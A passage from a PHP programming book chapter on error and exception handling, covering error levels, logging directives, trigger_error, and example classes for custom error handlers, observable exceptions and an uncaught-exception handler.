                                                 script—note my emphasis on potential. Errors of
                                                 this sort typically mean that something has
                                                 occurred that may indicate logical errors or
                                                 omissions, even though it hasn’t caused the PHP
                                                 interpreter to fail. Examples include accessing
                                                 undefined variables or array indices.

       E_WARNING / E_USER_WARNING                A warning indicates a nonfatal error from which
                                                 PHP has recovered. Warnings are generally reserved
                                                 for environmental errors, such as the inability of
                                                 the executing script to access a database or web
                                                 service, errors that occur while you’re running a
                                                 third-party extension, and so on.

       E_ERROR / E_USER_ERROR                    These are fatal runtime errors from which PHP was
                                                 unable to recover; typically, they will be errors that
                                                 occur on the OS level, such as problems
                                                 encountered while allocating memory or disk space.

                                                 Note that E_USER_ERRORs are actually
                                                 recoverable; when such errors are caught in a
                                                 custom error handler, the developer can choose
                                                 whether or not to exit script execution.

       E_STRICT                                  E_STRICT errors are basically notices, but these
                                                 are deployed to indicate that code you’ve used may
                                                 be deprecated, or may not follow best practices as
                                                 determined by the PHP interpreter.


      The display_errors Directive
      When display_errors is set, PHP errors will be displayed inline in your script’s
      output. This is a good setting to use in development, though it can disrupt any
      HTTP headers you’re trying to send: once an error message has been output, later
      attempts to send headers can fail.

      Once your application’s in production, turn display_errors off so that these messages
      are not displayed to your users.

The log_errors and error_log Directives
If log_errors is set, errors will be logged to the location specified in the error_log
directive. This setting is useful for maintaining a running log of the errors encountered
in your application or site, and is helpful because it acts as a reference
for all the errors that may arise when the display_errors directive is disabled.

You will likely want to set ignore_repeated_errors and ignore_repeated_source
to prevent those logs from filling up when the same error occurs repeatedly.
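
The directives above can also be applied at runtime with ini_set. The sketch below shows one way to switch between development and production settings; the function name configureErrorSettings, the environment names, and the log file location are assumptions made for illustration. It uses plain E_ALL for development, which on PHP 5.4 and later already includes E_STRICT.

```php
<?php
// Hypothetical helper: applies error settings for the named environment.
function configureErrorSettings($environment, $logFile)
{
    if ($environment === 'development') {
        // Report everything and show it inline.
        error_reporting(E_ALL);
        ini_set('display_errors', '1');
    } else {
        // Report only errors and warnings, and hide them from users.
        error_reporting(E_ERROR | E_USER_ERROR | E_WARNING | E_USER_WARNING);
        ini_set('display_errors', '0');
    }

    // Log in both environments, suppressing repeated entries.
    ini_set('log_errors', '1');
    ini_set('error_log', $logFile);
    ini_set('ignore_repeated_errors', '1');
    ini_set('ignore_repeated_source', '1');
}

configureErrorSettings('production', sys_get_temp_dir() . '/php-error.log');
```

Settings applied this way take effect only from the point at which the function runs, so errors raised earlier in the request still follow the php.ini values.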


How can I trigger PHP errors?
The capability to trigger errors is not restricted to the PHP interpreter. At times, you
may find it useful to generate PHP errors yourself—they can be used as a debugging
aid, to generate deprecation notices in code you’re releasing to others, and more.
So, how do you trigger PHP errors?

Solution
You can trigger errors within your code using PHP’s trigger_error function. This
function has the following prototype:

 trigger_error($error_message, $error_type = E_USER_NOTICE);



The $error_type argument must be one of the user error constants E_USER_NOTICE,
E_USER_WARNING, or E_USER_ERROR, which, as noted in the code above, defaults to
E_USER_NOTICE.


Discussion
When they first discover trigger_error, PHP developers have a tendency to use
it for any error conditions they observe in their code. However, better strategies
exist.

Trigger E_USER_NOTICEs primarily in development when debugging your code.
Notices can be helpful for indicating the values that have been set, when certain
pieces of code are executing, and so on. (Note, however, that this isn’t the most efficient
way to debug.)

      Trigger E_USER_WARNINGs when your code detects exceptional situations from which
      it can recover gracefully. For example, such a situation might arise if a web service
      cannot be contacted, but your code is still able to generate an error message; in this
      case, the warning serves as a prompt to check your application’s connectivity with
      the web services server later.

      Trigger E_USER_ERRORs when your code hits a problem from which it cannot recover.
      Examples of this kind of problem include a situation in which the executing script
      is unable to connect to your database, or you discover that your web site template
      directory is unreadable.
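
As a rough illustration of the E_USER_WARNING case, the sketch below warns and then falls back to placeholder content when a service call fails. The function fetchHeadlines and the $fetcher callback are hypothetical stand-ins for a real web service client, and the closure syntax assumes PHP 5.3 or later.

```php
<?php
// Hypothetical function: $fetcher stands in for a real web service call
// and returns an array of headlines, or false on failure.
function fetchHeadlines($fetcher)
{
    $headlines = call_user_func($fetcher);
    if ($headlines === false) {
        // Recoverable: raise a warning, then fall back to a placeholder.
        trigger_error('Headline service could not be contacted',
            E_USER_WARNING);
        return array('Headlines are temporarily unavailable');
    }
    return $headlines;
}

// A fetcher that succeeds, so no warning is raised here.
$headlines = fetchHeadlines(function () {
    return array('PHP 5 released');
});
```

The page is still generated when the fetcher fails, and the warning ends up wherever your error settings or custom handler send it.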


      How do I implement a custom
      error handler with PHP?
      The php.ini settings for handling errors are fairly limited. They really only cover the
      tasks of displaying and logging errors—you can’t even specify the format in which
      those errors are logged or displayed! What if you want to do something other than
      these tasks?

      Solution
      PHP allows developers to define custom error handlers. Such error handlers may
      constitute any valid PHP callback: a function, a static class method, or a dynamic
      class method. Whatever callback you decide to use, it must follow the error handler
      prototype:

       function handler($errno, $errmsg[, $filename[, $linenum[, $vars]]]) 



      When your custom error-handling function is called, the first parameter $errno
      will contain the level of the error as an integer; the second parameter, $errmsg, will
      contain the description of the error. $filename contains the name of the file containing
      the code that raised the error, $linenum contains the line number where the
      error was raised, and $vars contains an array of all variables that existed in the
      scope in which the error was triggered. You can choose to perform any task you
      like within your error handler: log errors, mail the error details to system administrators
      or developers, print the error details, and so on.

However, you should understand that if you do not explicitly exit script execution
in your error handler, program execution will continue from the location at which
the error was triggered originally. Your code will have no idea what tasks were
undertaken in the error handler, though.

Use the set_error_handler function to tell PHP to use your error handler:

 set_error_handler($error_handler[, $error_types])



The first parameter is a callback that references your error handler. The optional
second parameter is used to tell PHP which error types should be handled by your
custom function. By default, if no error type is provided, all errors will be handled
except for E_ERROR, E_PARSE, E_CORE_ERROR, E_CORE_WARNING, E_COMPILE_ERROR,
E_COMPILE_WARNING, and E_STRICT. Since you can specify the types, you can specify
multiple error handlers—one for each type you wish to handle.
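
A minimal sketch of registering a handler for selected error types follows. The handler body and the error message are made up for illustration. The handler declares only four parameters, because the fifth ($vars) is no longer passed as of PHP 8.

```php
<?php
$handled = array();

// Handle only user-level warnings and notices; every other level is
// left to PHP's default handler.
set_error_handler(
    function ($errno, $errmsg, $filename, $linenum) use (&$handled) {
        $handled[] = array($errno, $errmsg);
        return true; // tell PHP the error has been dealt with
    },
    E_USER_WARNING | E_USER_NOTICE
);

trigger_error('Template cache is stale', E_USER_NOTICE);

// The handler did not exit, so execution resumes here.
$resumed = true;

restore_error_handler();
```

Calling restore_error_handler puts back whichever handler was active before, which is useful when a handler should apply to only part of a script.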

An easier solution, however, is to use a single error handler for all error types you
wish to handle, and in it employ a switch statement that uses the value of the first
argument to the handler function—represented by $errno—to select alternative
actions that respond to specific error types. $errno is the error level of the triggered
error, the integer value represented by the error type constants listed in “What error
levels does PHP report?”. Then, the error handler needs to return true if the error
was handled, or false if not; returning false tells PHP to pass on error-handling
control to the default error handler. As an example, here’s a PHP 5 class that implements
a custom error handler which selects alternative actions appropriate to the
level of the error raised:

                                                         ErrorHandler.class.php (excerpt)

 <?php
 class ErrorHandler
 {
   protected $_noticeLog = '/tmp/notice.log';
   public $message = '';
   public $filename = '';
   public $line = 0;
   public $vars = array();
   public function __construct($message, $filename, $linenum, $vars)
   {
     $this->message = $message;
     $this->filename = $filename;
     // Store the line number in the declared $line property, which the
     // handler methods read when they build their messages.
     $this->line = $linenum;
     $this->vars = $vars;
   }




      The constructor accepts the various error attributes as arguments and stores them
      in the object’s properties. The $_noticeLog variable stores the location of the log
      file for E_USER_NOTICE level error messages. If you’re testing on a Windows machine
      you should change this value to something like C:\notice.log, or an appropriate
      location on your system.

      Here’s the custom error-handling method of our class:

                                                               ErrorHandler.class.php (excerpt)

         public static function handle($errno, $errmsg, $filename,
             $line, $vars)
         {
           $self = new self($errmsg, $filename, $line, $vars);
           switch ($errno) {
             case E_USER_ERROR:
               return $self->handleError();
             case E_USER_WARNING:
             case E_WARNING:
               return $self->handleWarning();
             case E_USER_NOTICE:
             case E_NOTICE:
               return $self->handleNotice();
             default:
               return false;
           }
         }



      The handle method above instantiates an ErrorHandler object with the error message,
      filename, line number, and variable context, and then calls the appropriate
      handler method based on $errno.

      If the error level does not match the levels handled by this class, it reverts the error
      flow to the default error handler by returning false.

Now we can build the methods that handle the different types of errors. First up is
the handleError method:

                                                                       ErrorHandler.class.php (excerpt)

      public function handleError()
      {
        // Capture the backtrace as a string without echoing it to the page.
        ob_start();
        debug_print_backtrace();
        $backtrace = ob_get_clean();
        $body =<<<EOT
    A fatal error occurred in the application:
    Message:   {$this->message}
    File:      {$this->filename}
    Line:      {$this->line}
    Backtrace:
    {$backtrace}
    EOT;
        // The fourth argument supplies extra mail headers.
        error_log($body, 1, 'sysadmin@example.com',
            "Subject: Fatal error occurred\n");
        exit(1);
      }



handleError is used to handle E_USER_ERROR level errors. When it’s called, this
method sends an email to the system administrator and halts execution. It uses a
little-known feature of PHP’s error_log function to send the email—if you specify
1 for the second argument and an email address as the third argument, it employs
the php.ini settings for sendmail to send an email. Finally, handleError halts execution
of the script using exit.3

Our next method is handleWarning:

                                                                       ErrorHandler.class.php (excerpt)

        public function handleWarning()
        {
          $body =<<<EOT
    An environmental error occurred in the application, and may
     indicate a potential larger issue:
    Message:   {$this->message}
    File:      {$this->filename}
    Line:      {$this->line}
    EOT;
          return error_log($body, 1, 'sysadmin@example.com',
              "Subject: Non-fatal error occurred\n");
        }

3 Calling exit with an integer exit status parameter of anything other than 0 indicates a script failure.




      handleWarning is used to handle E_USER_WARNING and E_WARNING errors. Like
      handleError above, it sends an email to the system administrator; however, instead
      of halting execution, it simply returns the result of the error_log function—true
      if the function succeeds, false if it fails.

      Finally, the handleNotice method:

                                                            ErrorHandler.class.php (excerpt)

           public function handleNotice()
           {
             $body =<<<EOT
       A NOTICE was raised with the following information:
       Message:   {$this->message}
       File:      {$this->filename}
       Line:      {$this->line}
       EOT;
             // Prefix a timestamp and end the entry with a newline.
             $body = date('[Y-m-d H:i:s] ') . $body . "\n";
             return error_log($body, 3, $this->_noticeLog);
           }
       }



      handleNotice handles E_USER_NOTICE and E_NOTICE level errors. Since notices do
      not represent dangerous errors, we assume that the system administrator doesn’t
      need to know about them immediately, and log them to a file instead of sending an
      email.

      Finally, we tell PHP that we want ErrorHandler::handle to act as our error handler,
      by using the aptly named set_error_handler function:

                                                            ErrorHandler.class.php (excerpt)

       set_error_handler(array('ErrorHandler', 'handle'));


Discussion
PHP error handlers are trivial to implement, and, because you can write your own
functionality, you can create whatever error handling strategies you desire. Be
careful to test your code stringently, however, as you don’t want to find yourself in
a circular error-handling situation, where your error handler starts emitting errors
that it then needs to handle itself.


How do I log and report errors?
You need to create a robust web application, but even the best software engineers
make mistakes. Perhaps you’re using third-party libraries that emit deprecation
notices. Or maybe your code, though in its infancy, has been pushed into production
due to time constraints.

You need to keep track of the errors occurring on your site somehow. What tools
does PHP offer for the job?

Solution
Logging errors is one thing—reporting them is a whole different ballgame. Logging
is usually best done via PHP’s own logging facilities. For example, you’ll recall that
the error_log setting can be set in php.ini, or at runtime using the ini_set function.

PHP’s error_log function can be used both to log errors and to send emails. It can
log errors to PHP’s error_log or an alternate log destination, or send an email to a
specified address (it uses mail to do the actual sending). Also, if you’re using a debugger,
it can send the information over the debugging connection.
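
As a small sketch of the "alternate log destination" case, message type 3 appends a message to a file you name. The temporary file and the message text below are assumptions chosen so the example is self-contained.

```php
<?php
// Hypothetical log location, for illustration only.
$logFile = tempnam(sys_get_temp_dir(), 'applog');

// Message type 3 appends the message to the named file. PHP adds no
// newline of its own, so the message supplies one.
$written = error_log("Payment gateway timed out\n", 3, $logFile);

$contents = file_get_contents($logFile);
```

Message type 0 (the default) writes to the destination configured by the error_log directive, and type 1 sends the message to the email address given as the third argument.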

While PHP’s logging functionality is nice, it still needs to be triggered within your
code—typically via your custom error handler.

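The simplest way to log errors is to set the relevant php.ini directives, here overridden
at runtime, like so:

 // Report everything except notices. The complement must wrap the combined
 // notice flags; ~E_NOTICE | ~E_USER_NOTICE would leave every bit set.
 error_reporting(E_ALL & ~(E_NOTICE | E_USER_NOTICE));
 ini_set('error_log', '/tmp/php-error.log');
 ini_set('ignore_repeated_errors', true);
 ini_set('ignore_repeated_source', true);
 ini_set('log_errors', true);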

      These settings will log all errors to /tmp/php-error.log except notices, repeated errors,
      and errors reported from the same source.

      You can also set up a custom error handler to conduct logging or reporting. Typically,
      the safest and easiest way to do so is simply to use error_log, as we saw in the
      solution in “How do I implement a custom error handler with PHP?”.

      If you intend to use email to report errors in your custom error handler, doing so
      via the error_log function or the standard PHP mail function may not be the best
      solution. A third-party library, for example PEAR::Mail, may be better suited to the
      task. In those cases, use the library within your custom error handler to send the
      email.4

      Finally, keep in mind that log files and email are not the only ways to report errors.
      You could also tell PHP to send SMS text messages and pager messages to your
      sysadmins or developers.


      How can I use PHP
      exceptions for error handling?
      PHP errors are useful, but they pose many problems:

      ■	 There’s no way to allow an error to bubble up the calling stack—errors must be
         handled immediately.

      ■	 The only way to exit the function or method that’s executing when an error is
         triggered is to have the handler exit script execution.

      ■	 It’s difficult to determine what the problem is without interrogating the error
         message, as any error you trigger yourself won’t have an associated error code
         or name.

      PHP 5 marked the introduction of a new error-handling scheme: exceptions. As I
      mentioned at the start of this chapter, an exception is used to denote exceptional
      behavior on the part of the script—situations in which something went wrong, or
      something unexpected occurred. Exceptions are thrown by your code, and bubble
      up through the code until they’re caught:

 throw new Exception(
     "There's something rotten in the state of this code");

4 For more information about sending email with PHP, see Chapter 7.



So, how can we use PHP exceptions to perform error handling?

Solution
Unlike PHP errors, exceptions can always be caught within your code, which allows
you to handle them gracefully when you have the facilities to do so. When an exception
is thrown, PHP will immediately look for a matching catch block and run
the code within it. Thus, it’s important to wrap your code within a try {…}
catch(Exception $e) {…} block at the point at which you wish to catch potential
exceptions. If an exception is not caught, PHP will generate a fatal error (level
E_ERROR) with the message “Uncaught exception.”

Now, within the catch block, you can deal with the exception in the way you feel
is best. For example, imagine you’re generating a web page that includes data from
a web service. You may throw an exception when the web service is unavailable,
but catch it later and display a “Service unavailable” message within the web page
you’re generating:

 try
 {
   $data = $this->getDataFromService();
 }
 catch (ServiceUnavailableException $e)
 {
   $data = 'Service unavailable';
 }



In this example, the script doesn’t exit completely as a result of the error. Instead,
the script finishes executing and the web page is generated successfully, so you’re
able to deal with the error at the right time and take appropriate action.
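
To make the bubbling behavior concrete, here is a self-contained sketch in which an exception thrown two calls deep is caught only where the page is assembled. The class ServiceUnavailableException and the functions callService, getDataFromService, and renderPage are hypothetical names used for illustration.

```php
<?php
// Hypothetical exception and functions, for illustration only.
class ServiceUnavailableException extends Exception {}

function callService()
{
    // Simulate a failed web service call.
    throw new ServiceUnavailableException('Connection refused');
}

function getDataFromService()
{
    // No try/catch here, so the exception passes straight through.
    return callService();
}

function renderPage()
{
    try {
        $data = getDataFromService();
    } catch (ServiceUnavailableException $e) {
        // Handle the failure where a sensible fallback exists.
        $data = 'Service unavailable';
    }
    return "<p>$data</p>";
}

$page = renderPage(); // "<p>Service unavailable</p>"
```

Only renderPage needs to know how to recover; the intermediate function stays free of error-handling code.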

If this sounds good, you’ll be pleased to hear that it gets even better—PHP 5 saw
the introduction of object type hinting. This facility forces parameters of functions
and methods to be objects of a particular class, or subclasses of that class. You can
use type hinting when you’re catching exceptions in a catch (Exception $e) {…}
block—multiple catch blocks can be used to catch different classes of exceptions:


       try
       {
         ⋮ try some code…
       }
       catch (PDOException $e)
       {
         ⋮ handle PDO exceptions…
       }
       catch (Zend_Exception $e)
       {
         ⋮ handle Zend Framework exceptions…
       }
       catch (Exception $e)
       {
         ⋮ handle all other exceptions…
       }
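
PHP tests catch blocks in the order they are written and runs the first one whose class matches, so more specific classes should come before their parents. The sketch below illustrates this with two hypothetical exception classes, Storage_Exception and Disk_Full_Exception, and a hypothetical function describeFailure.

```php
<?php
// Hypothetical exception classes, for illustration only.
class Storage_Exception extends Exception {}
class Disk_Full_Exception extends Storage_Exception {}

function describeFailure(Exception $thrown)
{
    try {
        throw $thrown;
    } catch (Disk_Full_Exception $e) {
        // Most specific class first.
        return 'disk full';
    } catch (Storage_Exception $e) {
        // Any other storage exception.
        return 'storage problem';
    } catch (Exception $e) {
        // Everything else.
        return 'something else';
    }
}

$results = array(
    describeFailure(new Disk_Full_Exception('No space left')),
    describeFailure(new Storage_Exception('Volume offline')),
    describeFailure(new Exception('Unknown')),
);
// $results is array('disk full', 'storage problem', 'something else')
```

Had the catch (Exception $e) block been listed first, it would have matched all three exceptions and the other blocks would never run.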



      Discussion
      One common mistake novices make is to use exceptions for every type of error
      situation. For instance, I’ve often seen constructs like this used to validate data:

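       public function isValidData($data)
       {
         if (!is_array($data))
         {
           throw new Exception('Invalid data');
         }
         // array_key_exists takes the key first, then the array; the 'id'
         // key name is inferred from the error message below.
         if (!array_key_exists('id', $data))
         {
           throw new Exception('Id key missing');
         }
         ⋮ finish validating…
         return true;
       }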



      What’s wrong with this code? Simply this: invalid data is just one of the possible
      results; it’s not an exceptional situation. In the case above, it’s best simply to return
      an error message or true. Then, you can always check for Boolean true or is_string
      on the return value:


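 public function isValidData($data)
 {
   if (!is_array($data))
   {
     return 'Invalid data';
   }
   // array_key_exists takes the key first, then the array; the 'id'
   // key name is inferred from the error message below.
   if (!array_key_exists('id', $data))
   {
     return 'Id key missing';
   }
   ⋮ finish validating…
   return true;
 }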
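
A caller of this style of validator might check the return value as sketched below. This is a standalone version of isValidData written as a plain function; the 'id' key and the wrapper function validationError are assumptions made for illustration.

```php
<?php
// Standalone version of the validator, with the 'id' key assumed.
function isValidData($data)
{
    if (!is_array($data)) {
        return 'Invalid data';
    }
    if (!array_key_exists('id', $data)) {
        return 'Id key missing';
    }
    return true;
}

// Hypothetical caller: returns the error message, or null on success.
function validationError($data)
{
    $result = isValidData($data);
    // Compare strictly: a non-empty string is truthy under a loose test.
    return ($result === true) ? null : $result;
}

$ok      = validationError(array('id' => 7));       // null
$notList = validationError('oops');                 // 'Invalid data'
$noId    = validationError(array('name' => 'x'));   // 'Id key missing'
```

The strict comparison matters here, because an error message such as 'Invalid data' would otherwise be treated as true in a plain if test.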



Another common mistake that’s related to the one above is to use exceptions as part
of the script’s program flow. Code that uses the original definition of isValidData
above, which throws exceptions, might look like this:

 try
 {
   $result = $this->isValidData($data);
 }
 catch (Exception $e)
 {
   if ('Invalid data' == $e->getMessage())
   {
      $error = $this->missingData();
   }
   elseif ('Id key missing' == $e->getMessage())
   {
      $error = $this->missingId($data);
   }
   else
   {
      $error = 'Unknown error';
   }
 }
 if (isset($error))
 {
    ⋮ handle error…
 }



In this example, the code uses exceptions within the program flow to make decisions;
it’s almost the equivalent of programming using GOTO statements. This is a fairly
      confusing way to express decision-making branches in your code, particularly when
      other methods are much more suitable (including testing return values from the
      function/method call, performing the various error method calls within the called
      function/method, and so on).

      Use exceptions when you can detect an event or condition in a unit of code that
      prevents any further execution. Good examples include:

      ■	 database errors
      ■	 web service call errors
      ■	 filesystem errors (such as permissions, missing paths, and so on)
      ■	 data encoding errors (until PHP 6 is out, that is)
      ■	 parse errors (for example, when parsing configuration or template files)

      When used wisely and sparingly, exceptions become a very powerful error-handling
      tool. For more information on PHP exceptions, read the relevant PHP manual page.5
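
As one sketch of the filesystem case from the list above, the function below throws when a template file cannot be read, because nothing useful can be rendered without it. The function name loadTemplate and the file path are hypothetical; RuntimeException is one of PHP's standard SPL exception classes.

```php
<?php
// Hypothetical template loader, for illustration only.
function loadTemplate($path)
{
    if (!is_readable($path)) {
        // Nothing useful can be rendered without the template.
        throw new RuntimeException("Template not readable: $path");
    }
    return file_get_contents($path);
}

try {
    // This path is assumed not to exist.
    $html = loadTemplate(sys_get_temp_dir() . '/no-such-template-9f3a.html');
} catch (RuntimeException $e) {
    $html = '<p>Sorry, this page is unavailable.</p>';
}
```

The loader itself makes no decision about what the user sees; that choice is left to whichever caller catches the exception.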


      How do I create a custom Exception class?
      The base Exception class provided in PHP 5 can be extended, but since exceptions
      bubble up the stack until they’re caught, why would you bother to create a custom
      Exception class? Well, if you use different Exception classes, it becomes much
      simpler to target specific types of exceptions and recover from them.

      Other reasons why you’d create a custom Exception class include:

      ■	 You want to log specific types of exceptions.

      ■	 You need to mail exception messages of particular classes.

      ■	 You want to create special __toString output for pretty printing exceptions, or
         use exceptions in other specialized circumstances (for example, an XML-RPC
         client or server might use an exception class for fault responses, with the
         __toString method creating the XML fault response).




      5 http://php.net/exceptions/


Solution
Exception classes extend either the base PHP Exception class, or a class derived
from it. To be able to catch your custom exception, all you need to do is extend the base class:

 class My_Exception extends Exception {} 



An exception that’s defined like this will act as would any other exception, though
it can be type hinted as My_Exception when you’re catching exceptions:

 try
 {
   ⋮ try some code…
 }
 catch (My_Exception $e)
 {
   ⋮ handle exception…
 }



The only overridable methods in the Exception class are __construct and
__toString. If you’re overriding the __construct method, your custom exception
should call parent::__construct to ensure all data in the exception is properly
set:

 class My_Exception extends Exception
 {
   public function __construct($message = null, $code = 0)
   {
     parent::__construct($message, $code);
      ⋮ do the rest of the initialization…
   }
 }
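
The following sketch shows both overridable methods together: a constructor that calls its parent, and a __toString method that produces a compact, log-friendly line. The class name Fault_Exception and the output format are hypothetical. An empty-string default is used for $message, an assumption made so the sketch also runs cleanly on newer PHP versions.

```php
<?php
// Hypothetical exception class, for illustration only.
class Fault_Exception extends Exception
{
    public function __construct($message = '', $code = 0)
    {
        // Let the base class record the message and code.
        parent::__construct($message, $code);
    }

    // Render the exception as a short, log-friendly line.
    public function __toString()
    {
        return sprintf('[%s #%d] %s',
            get_class($this), $this->getCode(), $this->getMessage());
    }
}

try {
    throw new Fault_Exception('Method not found', 404);
} catch (Fault_Exception $e) {
    $line = (string) $e; // "[Fault_Exception #404] Method not found"
}
```

Any code that echoes or logs the exception object now gets the custom format rather than PHP's default multi-line dump.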



Discussion
It’s useful to create exception classes to cover distinct groups of code that may span
more than one class. For instance, if you were creating a suite of input filter classes,
you may want to create a single exception class to cover them; however, if you’re
creating an MVC (Model-View-Controller) suite, you may want a different type of
exception class for each distinct area of the MVC pattern.

      Earlier, we mentioned logging and emailing exceptions. Unlike PHP errors, exceptions
      are not logged, unless they remain uncaught, in which case they are logged
      as fatal errors (level E_ERROR). Most of the time, you won’t want or need to log
      exceptions. However, some types of exceptions may indicate situations that need
      attention from a developer or sysadmin: for example, your script is unable to connect
      to a database (when PDO throws exceptions, not PHP errors, for instance), a web
      service is inaccessible, a file or directory is inaccessible (due to permissions, or
      the fact that it’s simply missing), and so on.

      The easy way to handle these situations is to override the exception’s constructor
      to perform the notification task. Here’s a custom exception class called My_Exception
      that calls the error_log function from within the constructor method:

       class My_Exception extends Exception
       {
         public function __construct($message = null, $code = 0)
         {
           parent::__construct($message, $code);
           error_log($this->getTraceAsString(), 3,
               '/tmp/my_exception.log');
         }
       }



      While this is an easy method for performing special error-logging actions when exceptions
      occur, I find that making the exception observable offers even more flexibility.
      Consider this usage example:

       Observable_Exception::attach(new Logging_Exception_Observer());
       Observable_Exception::attach(new Emailing_Exception_Observer());

       class Foo_Exception extends Observable_Exception {}

       ⋮ perform some work…
       throw new Foo_Exception('error occurred');



      In this example, I’ve created a base exception class that’s observable, and called it
      Observable_Exception. I’ve attached two observers to this class: one that logs, and
      one that sends email. These observers check the type of the exceptions they observe,
      and use that information to decide whether or not to act.

This strategy provides some flexibility in terms of the way exceptions are handled,
without requiring the use of an explicit exception handler. In addition, you can attach
an observer anywhere in your code, which means that you can decide how to handle
any given exception dynamically.

The code that implements observable exceptions is as follows:

                                                   Exception_Observer.class.php (excerpt)

 interface Exception_Observer
 {
   public function update(Observable_Exception $e);
 }



This code defines the interface for exception observers. We’ll implement the
Exception_Observer interface in a custom class in just a minute.

Next, we create the Observable_Exception class by extending the Exception class.
We add a static property—$_observers—to hold an array of Exception_Observer
instances:

                                                 Observable_Exception.class.php (excerpt)

 class Observable_Exception extends Exception
 {
   public static $_observers = array();



Next, a static method is used to attach observers. Type hinting ensures that only
objects implementing the Exception_Observer interface are accepted as observers:

                                                 Observable_Exception.class.php (excerpt)

   public static function attach(Exception_Observer $observer)
   {
     self::$_observers[] = $observer;
   }



We override the constructor method so that when the exception is instantiated all
observers are notified via a call to the notify method:

                                                    Observable_Exception.class.php (excerpt)

           public function __construct($message = '', $code = 0)
           {
             parent::__construct($message, $code);
             $this->notify();
           }



      Finally, the notify method loops through the array of observers and calls their
      update methods, passing a self-reference to the Observable_Exception object,
      $this:

                                                    Observable_Exception.class.php (excerpt)

           public function notify()
           {
             foreach (self::$_observers as $observer)
             {
               $observer->update($this);
             }
           }
       }



      Here’s an example of an exception observer:

                                              Logging_Exception_Observer.class.php (excerpt)

       require 'Exception_Observer.class.php';
       require 'Observable_Exception.class.php';
       class Logging_Exception_Observer implements Exception_Observer
       {
         protected $_filename = '/tmp/exception.log';
         public function __construct($filename = null)
         {
           if ((null !== $filename) && is_string($filename))
           {
             $this->_filename = $filename;
           }
         }
         public function update(Observable_Exception $e)
         {
           error_log($e->getTraceAsString(), 3, $this->_filename);
         }
       }




This particular implementation of Exception_Observer logs exception information
to a file. If you’re testing this code, make sure you set the $_filename variable to
an appropriate location and filename.

This strategy offers more flexibility than simply handling the logging or reporting
in the constructor method of a custom exception class, or defining an exception
handler function. Firstly, if you build a hierarchy of exception classes deriving from
the Observable_Exception class, you can attach any number of observers at any time,
customizing the exception environment without changing the actual exception code.
Because the static $_observers array is shared by every class in the hierarchy, each
observer is notified of every observable exception. Secondly, only the top-level
exception class needs to contain any additional code; all classes that derive from
that class can be empty stubs. Finally, each observer’s update method can use type
checking via PHP’s instanceof operator to decide whether or not any action needs to
be taken.
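
The type check described above might look like the following minimal sketch. The interface and base class are condensed copies of the ones shown earlier, repeated only so that the block runs on its own. Database_Exception, Validation_Exception, and Database_Exception_Observer are hypothetical names invented for this illustration, and the observer simply collects messages in an array rather than logging them.

```php
<?php
interface Exception_Observer
{
    public function update(Observable_Exception $e);
}

class Observable_Exception extends Exception
{
    public static $_observers = array();

    public static function attach(Exception_Observer $observer)
    {
        self::$_observers[] = $observer;
    }

    public function __construct($message = '', $code = 0)
    {
        parent::__construct($message, $code);
        // Notify every attached observer as soon as the exception exists.
        foreach (self::$_observers as $observer) {
            $observer->update($this);
        }
    }
}

// Hypothetical exception types used only for this illustration.
class Database_Exception extends Observable_Exception {}
class Validation_Exception extends Observable_Exception {}

// Hypothetical observer: reacts only to Database_Exception instances.
class Database_Exception_Observer implements Exception_Observer
{
    public $seen = array();

    public function update(Observable_Exception $e)
    {
        if (!($e instanceof Database_Exception)) {
            return; // not a database problem, so ignore it
        }
        $this->seen[] = $e->getMessage();
    }
}

$observer = new Database_Exception_Observer();
Observable_Exception::attach($observer);

// Observers are notified on construction, even when the exception is caught.
try {
    throw new Validation_Exception('bad input');
} catch (Validation_Exception $e) {
    // handled elsewhere in a real application
}
try {
    throw new Database_Exception('connection refused');
} catch (Database_Exception $e) {
    // handled elsewhere in a real application
}
```

After this runs, $observer->seen contains only the 'connection refused' message, because the instanceof check skipped the Validation_Exception.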


How do I implement a custom
exception handler with PHP?
A custom handler for PHP errors can be specified using the set_error_handler
function. Exceptions bubble up until they’re caught, but what happens if they’re
not caught? By default, any exception that isn’t caught results in a fatal error
(E_ERROR). A handler registered with set_error_handler can’t intercept fatal
errors, so how can you handle uncaught exceptions?

Solution
Like PHP errors, exceptions can be handled automatically using a custom exception
handler that’s specified with the set_exception_handler function.

You’d typically implement an exception handler if you wanted your program to
take a particular action for an uncaught exception—for example, you might want
to redirect the user to an error page, or to log or email the exception so the developer
can correct the issue.

      The basic approach involves providing a callback to set_exception_handler:

       null|string set_exception_handler(mixed callback)
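
As a minimal sketch of that callback mechanism, the following registers two handlers in turn. It assumes PHP 5.3 or later for the closures; note that from PHP 7 the handler may receive any Throwable, not only an Exception, so the parameters are left untyped here. The function name format_uncaught and both handler variables are hypothetical. The point of interest is that set_exception_handler returns the handler it replaces, and restore_exception_handler undoes the most recent registration.

```php
<?php
// Hypothetical helper: builds a one-line summary of an uncaught exception.
function format_uncaught($e)
{
    return get_class($e) . ': ' . $e->getMessage();
}

// First handler: write a summary to PHP's configured error log.
$logHandler = function ($e) {
    error_log(format_uncaught($e));
};

// Second handler: reuse the first one, then show a generic message.
$pageHandler = function ($e) use ($logHandler) {
    $logHandler($e);
    echo 'Sorry, something went wrong.';
};

set_exception_handler($logHandler);

// Registering a new handler returns the one it replaces.
$previous = set_exception_handler($pageHandler);

// The summary a handler would log for a sample exception.
$summary = format_uncaught(new RuntimeException('database unavailable'));

// Undo both registrations so the sketch leaves no handler behind.
restore_exception_handler();
restore_exception_handler();
```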



      Discussion
      Since exception handlers handle any uncaught exception—not exceptions of specific
      types—they’re somewhat easier to implement than error handlers. In this example,
      we create a custom exception-handling class that logs uncaught exceptions to a file,
      and displays a simple error page:

                                                           ExceptionHandler.class.php (excerpt)

       <?php
       class ExceptionHandler
       {
         protected $_exception;
         protected $_logFile = '/tmp/exception.log';
         public function __construct(Exception $e)
         {
           $this->_exception = $e;
         }
         public static function handle(Exception $e)
         {
           $self = new self($e);
           $self->log();
           echo $self;
         }



      The entry point for this exception handler is the static handle method, which
      instantiates the class, logs the exception, then displays an error message by echoing
      the instance (using the magic __toString method). If you’re testing this code, make
      sure you set the $_logFile property to an appropriate location and filename.

      This code uses PHP’s error_log function to log the exception backtrace to a file:

                                                 ExceptionHandler.class.php (excerpt)

   public function log()
   {
     error_log($this->_exception->getTraceAsString(), 3,
         $this->_logFile);
   }



The __toString implementation below creates a “pretty” error page that’s displayed
when an exception is handled, preventing the display to users of any sensitive
information contained in the exception backtrace:

                                                 ExceptionHandler.class.php (excerpt)

   public function __toString()
   {
     $message =<<<EOH
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
